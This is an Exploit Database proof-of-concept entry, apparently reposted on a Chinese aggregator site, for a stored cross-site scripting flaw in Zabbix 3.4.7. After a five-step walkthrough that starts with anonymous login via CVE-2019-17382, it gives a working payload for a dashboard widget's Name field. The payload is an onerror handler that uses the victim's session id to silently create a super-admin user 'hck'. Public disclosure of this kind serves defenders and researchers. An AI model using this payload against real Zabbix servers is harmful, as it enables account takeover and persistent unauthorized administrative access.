Zabbix 3.4.7 – Stored XSS

• Exploit Database
• 13 阅读

• 作者： Radmil Gazizov
  日期： 2021-03-31
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/49729/

• # Exploit Title: Zabbix 3.4.7 - Stored XSS
  # Date: 30-03-2021
  # Exploit Author: Radmil Gazizov
  # Vendor Homepage: https://www.zabbix.com/
  # Software Link: https://www.zabbix.com/rn/rn3.4.7
  # Version: 3.4.7
  # Tested on: Linux
  
  # Reference -
  https://github.com/GloryToMoon/POC_codes/blob/main/zabbix_stored_xss_347.txt
  
  1- Go to /zabbix/zabbix.php?action=dashboard.list (anonymous login CVE-2019-17382)
  2- Create new dashboard
  3- Add a new widget => Type: Map nabigation tree
  4- Past into parameter "Name": <img src="https://www.exploit-db.com/exploits/49729/x" onerror="var n='hck',q=jQuery;q.post('users.php',{sid:q('#sid').attr('value'),form:'Create+user',alias:n,name:n,surname:n,'user_groups[]':7,password1:n,password2:n,theme:'default',refresh:'9s',rows_per_page:9,url:'',user_type:3,add:'Add'});">
  5- Click to "Add" button